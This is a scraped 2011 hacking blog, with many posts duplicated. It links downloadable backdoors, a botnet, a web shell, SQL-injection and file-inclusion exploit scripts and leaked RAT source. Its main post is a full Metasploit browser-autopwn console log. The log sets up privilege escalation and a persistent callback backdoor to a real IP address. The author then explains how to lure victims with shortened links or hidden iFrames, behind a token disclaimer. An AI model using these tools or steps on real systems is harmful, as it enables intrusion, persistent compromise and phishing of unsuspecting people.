Here are some screenshots of it in action!
About to scan...
Scan complete, bug found!
It has no crawler as of yet, but should have one in the next release!
Monday, 29 August 2011
PyXSSer v0.3 Released!
Quick post about a new tool I noticed today named PyXSSer. It can be found at darkpy.net and is a XSS testing tool in Python. It is still in development and I am told it should have a new version out soon :)
Here are some screenshots of it in action!
About to scan...
Scan complete, bug found!
It has no crawler as of yet, but should have one in the next release!
Here are some screenshots of it in action!
About to scan...
Scan complete, bug found!
It has no crawler as of yet, but should have one in the next release!
Saturday, 20 August 2011
Quick Update
Quick analysis and sample of some new FB spreading malware to come tomorrow...
If I can be bothered :P
Also, more Linux malware dissection to come - I have gotten a MASSIVE collection to rip apart. If you have any, send it my way :D
Sorry about lack of content, I am addicted to Death Note (Anime) ever since I downloaded the entire fucking thing.
Review of the latest SS Rat and DarkComet to come as soon as possible also!
If I can be bothered :P
Also, more Linux malware dissection to come - I have gotten a MASSIVE collection to rip apart. If you have any, send it my way :D
Sorry about lack of content, I am addicted to Death Note (Anime) ever since I downloaded the entire fucking thing.
Review of the latest SS Rat and DarkComet to come as soon as possible also!
Thursday, 18 August 2011
Some tools I felt like sharing :)
This post is just so I can share a bundle of tools :) I was gonna make just two tarballs, but instead made them all different so you can select what ones you want.
Hydrogen.tgz - this is the Hydrogen backdoor written by Immunity. Look through it, it is very interesting. Client runs on Linux, the backdoor is for windows but IIRC it can be compiled to be used on Linux hosts too. I will be writing a much longer article about this in a later instalment...
Hydrogen
QuadNX - Linux HTTP botnet, pain in the ass to set up. But works fine. I use it in VM's for stress testing apps on other VM's - botnet simulations :D
QuadNX
sshdoor.tgz - Bindshell that uses secure SSH protocol things to make it a secure backdoor. Was "new" when it came out, now backdoors are a lot more secure.
SSHdoor
websh-0.1a.tar.bz2 - shell script and php script, php script goes on the pwned server, shell script is the client. Gives a terminal like access. Have not played with it too much and cannot recall where I got the fucker...
WebSH
dorker.pl - This is a perl script that uses a google API key to search for SQLi vuln sites and then sorts them checking which ones are vulnerable :D
Dorker
sql2rce.pl - This is a perl script to automate the process of getting remote code execution via SQL injection vulns and the apache log injection method.
SQL2RCE
lfi2rce.pl - This is a perl script to automate the process of getting remote code execution via Local File Inclusion vulns and the log injection method.
LFI2RCE
sqlier-0.8.2b.sh - This is a shell script that automates some SQL injection attacks.
SQLier
shbrute.sh (in netcatscripts.tar.gz) - This tool uses netcat to check for anonymous FTP access allowed, if not, it brute forces the FTP
shwebscan.sh (in netcatscripts.tar.gz) - This tool can scan for admin, or exploit both LFI and RFI vulns to inject a malicious PHP script like a C99.
netcatscripts.tar.gz
gwee-1.36.tar.gz - this is a powerful tool for getting reverse shells using CGI-BIN exploits. It needs work to compile on *nix, but the windows binary works with wine.
SOURCE (and compiled Windows bin) Gwee-Source
Compiled Linux bin GWEE-Unix bin
Kingcopes SSH 0day remote root for FreeBSD (old but fun!)
ssh_0day.tar.gz
And finally, something I found in my travels and plan to dissect - Linux malware called the "LinuQ Sploit Pack"
Linux malware <--Warning. Do not run. Breaks things :(
That is all for now, though I am thinking of having every second link being an ad-fly link or something to make some money and get more storage from Dropbox, but I dont want to do that yet... Donations are welcome ;)
Hydrogen.tgz - this is the Hydrogen backdoor written by Immunity. Look through it, it is very interesting. Client runs on Linux, the backdoor is for windows but IIRC it can be compiled to be used on Linux hosts too. I will be writing a much longer article about this in a later instalment...
Hydrogen
QuadNX - Linux HTTP botnet, pain in the ass to set up. But works fine. I use it in VM's for stress testing apps on other VM's - botnet simulations :D
QuadNX
sshdoor.tgz - Bindshell that uses secure SSH protocol things to make it a secure backdoor. Was "new" when it came out, now backdoors are a lot more secure.
SSHdoor
websh-0.1a.tar.bz2 - shell script and php script, php script goes on the pwned server, shell script is the client. Gives a terminal like access. Have not played with it too much and cannot recall where I got the fucker...
WebSH
dorker.pl - This is a perl script that uses a google API key to search for SQLi vuln sites and then sorts them checking which ones are vulnerable :D
Dorker
sql2rce.pl - This is a perl script to automate the process of getting remote code execution via SQL injection vulns and the apache log injection method.
SQL2RCE
lfi2rce.pl - This is a perl script to automate the process of getting remote code execution via Local File Inclusion vulns and the log injection method.
LFI2RCE
sqlier-0.8.2b.sh - This is a shell script that automates some SQL injection attacks.
SQLier
shbrute.sh (in netcatscripts.tar.gz) - This tool uses netcat to check for anonymous FTP access allowed, if not, it brute forces the FTP
shwebscan.sh (in netcatscripts.tar.gz) - This tool can scan for admin, or exploit both LFI and RFI vulns to inject a malicious PHP script like a C99.
netcatscripts.tar.gz
gwee-1.36.tar.gz - this is a powerful tool for getting reverse shells using CGI-BIN exploits. It needs work to compile on *nix, but the windows binary works with wine.
SOURCE (and compiled Windows bin) Gwee-Source
Compiled Linux bin GWEE-Unix bin
Kingcopes SSH 0day remote root for FreeBSD (old but fun!)
ssh_0day.tar.gz
And finally, something I found in my travels and plan to dissect - Linux malware called the "LinuQ Sploit Pack"
Linux malware <--Warning. Do not run. Breaks things :(
That is all for now, though I am thinking of having every second link being an ad-fly link or something to make some money and get more storage from Dropbox, but I dont want to do that yet... Donations are welcome ;)
Tuesday, 9 August 2011
SS-RAT 2.0 Alpha 2 release!
SS-RAT 2.0 Alpha-2 is out!
With a lot more functionality than the first alpha, SS-RAT v2 is now available to download. It is totally open source like all of Slayers projects, and is available from the google code repo here...
https://code.google.com/p/schwarzesonenrat/
I am refraining from writing more detailed stuff on it until its final release:)
BT5 Revision 1 is out tomorrow :D
With a lot more functionality than the first alpha, SS-RAT v2 is now available to download. It is totally open source like all of Slayers projects, and is available from the google code repo here...
https://code.google.com/p/schwarzesonenrat/
I am refraining from writing more detailed stuff on it until its final release:)
BT5 Revision 1 is out tomorrow :D
LokiRAT leaked source code
Just a quick post - LokiRAT, a little known PHP RAT (as in, controlled by a PHP script that acts as a proxy between commander and slave) has had its C# source leaked.
http://dl.dropbox.com/u/36983782/Source.rar
Converting to C++ and adding some/removing some features is a project I am working on in my free time - I want to remove useless crap and add a Hijack Proxy feature.
http://dl.dropbox.com/u/36983782/Source.rar
Converting to C++ and adding some/removing some features is a project I am working on in my free time - I want to remove useless crap and add a Hijack Proxy feature.
Friday, 5 August 2011
BackTrack Linux and ExploitDB under DDoS or something?
See the video, note the date and time, I just recorded it there and converted it.
I think someones being an arsehole again to the OffSec team :(
DDoS is no fun!
I think someones being an arsehole again to the OffSec team :(
DDoS is no fun!
Thursday, 4 August 2011
Remember - sudo as an access control is UNIVERSALLY STUPID!
Hi, this is Darren again, showing how poorly set SUDO privs can REALLY ruin your day.
We have made a user (fuck) with a password of (fuck) and given the silly fucker access to "less" via SUDO.
Now lets REALLY ruin the sysadmins life, by giving FUCK root with a few commands!
See the video - it shows how it works :D
Remember - sudo as an access control is UNIVERSALLY STUPID! Use it as an AUDIT tool for logs instead!
~I take no responsibility for use of this here infodox. Use wisely
We have made a user (fuck) with a password of (fuck) and given the silly fucker access to "less" via SUDO.
Now lets REALLY ruin the sysadmins life, by giving FUCK root with a few commands!
See the video - it shows how it works :D
Remember - sudo as an access control is UNIVERSALLY STUPID! Use it as an AUDIT tool for logs instead!
~I take no responsibility for use of this here infodox. Use wisely
Wednesday, 3 August 2011
Tutorials by Hex - WEP cracking (GERIX) and MAC Spoofing
Seeing as Hex cannot be fucked mantaining a blog, and I can, and we are working together on writing tutorials, making videos, etc... We decided that I would republish his manuals here :)
http://dl.dropbox.com/u/36983782/WEPcrackingforidiots.pdf
That is his WEP cracking guide...
http://dl.dropbox.com/u/36983782/macspoofingforidiots.pdf
That is the MAC spoofing guide...
Enjoy, and remember - dont be malicious!
http://dl.dropbox.com/u/36983782/WEPcrackingforidiots.pdf
That is his WEP cracking guide...
http://dl.dropbox.com/u/36983782/macspoofingforidiots.pdf
That is the MAC spoofing guide...
Enjoy, and remember - dont be malicious!
Remote Admin Tools: DarkComet Tutorial/Overview
Get it here: http://dl.dropbox.com/u/36983782/darkcomet-tut.pdf
Now thing is, some people are going to say "LOL Dudes a skid RATS are for skids".
Ok, sure, whatever. Just remember: Poison Ivy is a RAT. Poison Ivy is an OLD RAT and it was SUCCESSFULLY used to pwn RSA.
Backdoors, malware, keyloggers, all that jazz, are actually a core feature in todays threat landscape, and therefore, I believe they CAN be useful in a penetration test - especially for mantaining access.
The PDF I link to is a primer on using one of the more common ones available. Try it - it is shocking how much one can do with em.
Now thing is, some people are going to say "LOL Dudes a skid RATS are for skids".
Ok, sure, whatever. Just remember: Poison Ivy is a RAT. Poison Ivy is an OLD RAT and it was SUCCESSFULLY used to pwn RSA.
Backdoors, malware, keyloggers, all that jazz, are actually a core feature in todays threat landscape, and therefore, I believe they CAN be useful in a penetration test - especially for mantaining access.
The PDF I link to is a primer on using one of the more common ones available. Try it - it is shocking how much one can do with em.
Monday, 1 August 2011
Minor setback - SSD drive sais no
Ok, I was GOING to post about integrating BeEF (Browser Exploitation Framework) and Metasploits Browser Autopwn to create a horrible mess of browser-based evilness... I was half way through writing it up when suddenly, everything ceased working. So I tried a reboot. "No bootable media". WTF.
So I cracked the Acer open and found that indeed, my SSD drive had seemingly *cooked* itself, and it was fucking ROASTING hot. It was removed for the sake of safety, and I am booting from USB now.
I am waiting to get a replacement hard disc (later today) and then will do TWO writeups, one on WEP cracking the lazy mans way (Gerix) and another on either BeEF or some features of SET or something. I will also retake some screenshots of browser-autopwn, fun with those Netopia Routers (what does this command do?) and a few other things.
Also, photos of insides of the Acer for the hell of it lol, and a shot of my toolkit I used to pry it open in College.
So I cracked the Acer open and found that indeed, my SSD drive had seemingly *cooked* itself, and it was fucking ROASTING hot. It was removed for the sake of safety, and I am booting from USB now.
I am waiting to get a replacement hard disc (later today) and then will do TWO writeups, one on WEP cracking the lazy mans way (Gerix) and another on either BeEF or some features of SET or something. I will also retake some screenshots of browser-autopwn, fun with those Netopia Routers (what does this command do?) and a few other things.
Also, photos of insides of the Acer for the hell of it lol, and a shot of my toolkit I used to pry it open in College.
Sunday, 31 July 2011
Browser Autopwn and Post Exploitation Automation
Browser Autopwn and Post Exploitation Automation
In this post I simply show how you can leverage Metasploits Browser Autopwn feature and post-exploit automation to make your pwnage more efficient.
I will simply post a text-log for now of the console session... I will, at the bottom, show all the commands executed and explain why/what they do.
########
root@bt:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.0.0-testing [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 360 auxiliary - 70 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13406 updated yesterday (2011.07.29)
msf > setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options (auxiliary/server/browser_autopwn):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > set LHOST 140.203.213.173
LHOST => 140.203.213.173
msf auxiliary(browser_autopwn) > show advanced
Module advanced options:
Name : AutoRunScript
Current Setting:
Description : A script to automatically on session creation.
Name : AutoSystemInfo
Current Setting: true
Description : Automatically capture system information on initialization.
Name : DEBUG
Current Setting: false
Description : Do not obfuscate the javascript and print various bits of useful
info to the browser
Name : EXCLUDE
Current Setting:
Description : Only attempt to use exploits whose name DOES NOT match this
regex
Name : InitialAutoRunScript
Current Setting: migrate -f
Description : An initial script to run on session created (before
AutoRunScript)
Name : LPORT_GENERIC
Current Setting: 6666
Description : The port to use for generic reverse-connect payloads
Name : LPORT_JAVA
Current Setting: 7777
Description : The port to use for Java reverse-connect payloads
Name : LPORT_LINUX
Current Setting: 4444
Description : The port to use for Linux reverse-connect payloads
Name : LPORT_MACOS
Current Setting: 5555
Description : The port to use for Mac reverse-connect payloads
Name : LPORT_WIN32
Current Setting: 3333
Description : The port to use for Windows reverse-connect payloads
Name : ListenerComm
Current Setting:
Description : The specific communication channel to use for this service
Name : MATCH
Current Setting:
Description : Only attempt to use exploits whose name matches this regex
Name : PAYLOAD_GENERIC
Current Setting: generic/shell_reverse_tcp
Description : The payload to use for generic reverse-connect payloads6
Name : PAYLOAD_JAVA
Current Setting: java/meterpreter/reverse_tcp
Description : The payload to use for Java reverse-connect payloads
Name : PAYLOAD_LINUX
Current Setting: linux/meterpreter/reverse_tcp
Description : The payload to use for Linux reverse-connect payloads
Name : PAYLOAD_MACOS
Current Setting: osx/meterpreter/reverse_tcp
Description : The payload to use for Mac reverse-connect payloads
Name : PAYLOAD_WIN32
Current Setting: windows/meterpreter/reverse_tcp
Description : The payload to use for Windows reverse-connect payloads
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
msf auxiliary(browser_autopwn) > set autorunscript use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173
autorunscript => use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2011-07-31 16:46:01 +0100
msf auxiliary(browser_autopwn) > [*] Done in 4.250804937 seconds
[*] Starting exploit modules on host 140.203.213.173...
[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/olNIWYBO
[*] Local IP: http://140.203.213.173:80/olNIWYBO
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/MJRGMyJeIZ
[*] Local IP: http://140.203.213.173:80/MJRGMyJeIZ
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/tgeUOMS
[*] Local IP: http://140.203.213.173:80/tgeUOMS
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/hHgo
[*] Local IP: http://140.203.213.173:80/hHgo
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/vgsBT
[*] Local IP: http://140.203.213.173:80/vgsBT
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/lBSv
[*] Local IP: http://140.203.213.173:80/lBSv
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/WSwQ
[*] Local IP: http://140.203.213.173:80/WSwQ
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/LaCtIRmKFgjC
[*] Local IP: http://140.203.213.173:80/LaCtIRmKFgjC
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/YDmj
[*] Local IP: http://140.203.213.173:80/YDmj
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/OhNdpjvw
[*] Local IP: http://140.203.213.173:80/OhNdpjvw
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/gBDljyzASUIE
[*] Local IP: http://140.203.213.173:80/gBDljyzASUIE
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/uWVoWM
[*] Local IP: http://140.203.213.173:80/uWVoWM
[*] Server started.
[*] Using URL: http://0.0.0.0:80/cCeAI
[*] Local IP: http://140.203.213.173:80/cCeAI
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/oMMWLifmjN
[*] Local IP: http://140.203.213.173:80/oMMWLifmjN
[*] Server started.
[*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/olsZbkWuHiC
[*] Local IP: http://140.203.213.173:80/olsZbkWuHiC
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/VJwjFpawhrII
[*] Local IP: http://140.203.213.173:80/VJwjFpawhrII
[*] Server started.
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/vPSnVmSgq
[*] Local IP: http://140.203.213.173:80/vPSnVmSgq
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/KamK
[*] Local IP: http://140.203.213.173:80/KamK
[*] Server started.
[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/kQfuNvwQvRfF
[*] Local IP: http://140.203.213.173:80/kQfuNvwQvRfF
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/eJDSgMe
[*] Local IP: http://140.203.213.173:80/eJDSgMe
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/yUgUbxfOz
[*] Local IP: http://140.203.213.173:80/yUgUbxfOz
[*] Server started.
[*] Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/FJULEockuokO
[*] Local IP: http://140.203.213.173:80/FJULEockuokO
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 140.203.213.173:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 140.203.213.173:6666
[*] Starting the payload handler...
[*] Started reverse handler on 140.203.213.173:7777
[*] Starting the payload handler...
[*] --- Done, found 22 exploit modules
[*] Using URL: http://0.0.0.0:80/Jg8bET0lG
[*] Local IP: http://140.203.213.173:80/Jg8bET0lG
[*] Server started.
msf auxiliary(browser_autopwn) > sessions -l
Active sessions
===============
No active sessions.
msf auxiliary(browser_autopwn) >
########
"setg payload windows/meterpreter/reverse_tcp"
> This command simply sets the global variable for payload as Windows Meterpreter where applicable.
"use server/browser_autopwn"
> This is to "use" the browser autopwn method
"show options"
> This shows options for the specific module
"set SRVPORT 80"
> Sets the variable SRVPORT to 80, meaning the port the targets must connect to is 80.
"set LHOST 140.203.213.173"
> Sets the IP address for back-connects to 140.203.213.173. Set this to your listener - normally the one started by metasploit, i.e. YOU.
"show advanced"
> Shows advanced options for the module
"set autorunscript use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173"
> This is my own little mixin. It runs three commands one after another.
>> First, it loads the "priv" plugin, so it can prepare to escalate privilages on pwned systems.
>>> Next it runs getsystem whilch escalates privilages to SYSTEM
>>>> Finally, it sets Meterpreter as Persistant Post Reboot. I explain the flags below.
>>>>> -U means it runs the Meterpreter Persistant Backdoor on User Login
>>>>>> -i 5 means it sleeps 5 seconds between reconnect retries. I set this to a big number if theres an IDS.
>>>>>>> -p 6666 is the port to connect back to where a Multi/handler is listening
>>>>>>>> -r 140.203.213.173 is the IP to connect back to.
PROTIP: Set up Metasploit on a VPS and run multi/handler on 443 so the backdoors connect back to that. 443 is good for firewall bypassing.
"run"
> This command runs the module!
"sessions -l"
> this command lists created meterpreter/shell sessions
"sessions -i 1" (not used here)
> Interact with session 1. -i <number of session> means interact with session <number>.
Once you set it up, a nasty trick is to send the link (IP:Port of server) as a tinyurl encoded link to people, so they get pwned rather swiftly. Or embed the link as an iFrame with onload into a malicious website for spear phishing...
Have fun.
~For informational and educational purposes only, I am not responsible for your use of this infodox. Dont be malicious... Its mean!
In this post I simply show how you can leverage Metasploits Browser Autopwn feature and post-exploit automation to make your pwnage more efficient.
I will simply post a text-log for now of the console session... I will, at the bottom, show all the commands executed and explain why/what they do.
########
root@bt:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.0.0-testing [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 360 auxiliary - 70 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13406 updated yesterday (2011.07.29)
msf > setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options (auxiliary/server/browser_autopwn):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > set LHOST 140.203.213.173
LHOST => 140.203.213.173
msf auxiliary(browser_autopwn) > show advanced
Module advanced options:
Name : AutoRunScript
Current Setting:
Description : A script to automatically on session creation.
Name : AutoSystemInfo
Current Setting: true
Description : Automatically capture system information on initialization.
Name : DEBUG
Current Setting: false
Description : Do not obfuscate the javascript and print various bits of useful
info to the browser
Name : EXCLUDE
Current Setting:
Description : Only attempt to use exploits whose name DOES NOT match this
regex
Name : InitialAutoRunScript
Current Setting: migrate -f
Description : An initial script to run on session created (before
AutoRunScript)
Name : LPORT_GENERIC
Current Setting: 6666
Description : The port to use for generic reverse-connect payloads
Name : LPORT_JAVA
Current Setting: 7777
Description : The port to use for Java reverse-connect payloads
Name : LPORT_LINUX
Current Setting: 4444
Description : The port to use for Linux reverse-connect payloads
Name : LPORT_MACOS
Current Setting: 5555
Description : The port to use for Mac reverse-connect payloads
Name : LPORT_WIN32
Current Setting: 3333
Description : The port to use for Windows reverse-connect payloads
Name : ListenerComm
Current Setting:
Description : The specific communication channel to use for this service
Name : MATCH
Current Setting:
Description : Only attempt to use exploits whose name matches this regex
Name : PAYLOAD_GENERIC
Current Setting: generic/shell_reverse_tcp
Description : The payload to use for generic reverse-connect payloads6
Name : PAYLOAD_JAVA
Current Setting: java/meterpreter/reverse_tcp
Description : The payload to use for Java reverse-connect payloads
Name : PAYLOAD_LINUX
Current Setting: linux/meterpreter/reverse_tcp
Description : The payload to use for Linux reverse-connect payloads
Name : PAYLOAD_MACOS
Current Setting: osx/meterpreter/reverse_tcp
Description : The payload to use for Mac reverse-connect payloads
Name : PAYLOAD_WIN32
Current Setting: windows/meterpreter/reverse_tcp
Description : The payload to use for Windows reverse-connect payloads
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
msf auxiliary(browser_autopwn) > set autorunscript use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173
autorunscript => use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2011-07-31 16:46:01 +0100
msf auxiliary(browser_autopwn) > [*] Done in 4.250804937 seconds
[*] Starting exploit modules on host 140.203.213.173...
[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/olNIWYBO
[*] Local IP: http://140.203.213.173:80/olNIWYBO
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/MJRGMyJeIZ
[*] Local IP: http://140.203.213.173:80/MJRGMyJeIZ
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/tgeUOMS
[*] Local IP: http://140.203.213.173:80/tgeUOMS
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/hHgo
[*] Local IP: http://140.203.213.173:80/hHgo
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/vgsBT
[*] Local IP: http://140.203.213.173:80/vgsBT
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/lBSv
[*] Local IP: http://140.203.213.173:80/lBSv
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/WSwQ
[*] Local IP: http://140.203.213.173:80/WSwQ
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/LaCtIRmKFgjC
[*] Local IP: http://140.203.213.173:80/LaCtIRmKFgjC
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/YDmj
[*] Local IP: http://140.203.213.173:80/YDmj
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/OhNdpjvw
[*] Local IP: http://140.203.213.173:80/OhNdpjvw
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/gBDljyzASUIE
[*] Local IP: http://140.203.213.173:80/gBDljyzASUIE
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/uWVoWM
[*] Local IP: http://140.203.213.173:80/uWVoWM
[*] Server started.
[*] Using URL: http://0.0.0.0:80/cCeAI
[*] Local IP: http://140.203.213.173:80/cCeAI
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/oMMWLifmjN
[*] Local IP: http://140.203.213.173:80/oMMWLifmjN
[*] Server started.
[*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/olsZbkWuHiC
[*] Local IP: http://140.203.213.173:80/olsZbkWuHiC
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/VJwjFpawhrII
[*] Local IP: http://140.203.213.173:80/VJwjFpawhrII
[*] Server started.
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/vPSnVmSgq
[*] Local IP: http://140.203.213.173:80/vPSnVmSgq
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/KamK
[*] Local IP: http://140.203.213.173:80/KamK
[*] Server started.
[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/kQfuNvwQvRfF
[*] Local IP: http://140.203.213.173:80/kQfuNvwQvRfF
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/eJDSgMe
[*] Local IP: http://140.203.213.173:80/eJDSgMe
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/yUgUbxfOz
[*] Local IP: http://140.203.213.173:80/yUgUbxfOz
[*] Server started.
[*] Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/FJULEockuokO
[*] Local IP: http://140.203.213.173:80/FJULEockuokO
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 140.203.213.173:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 140.203.213.173:6666
[*] Starting the payload handler...
[*] Started reverse handler on 140.203.213.173:7777
[*] Starting the payload handler...
[*] --- Done, found 22 exploit modules
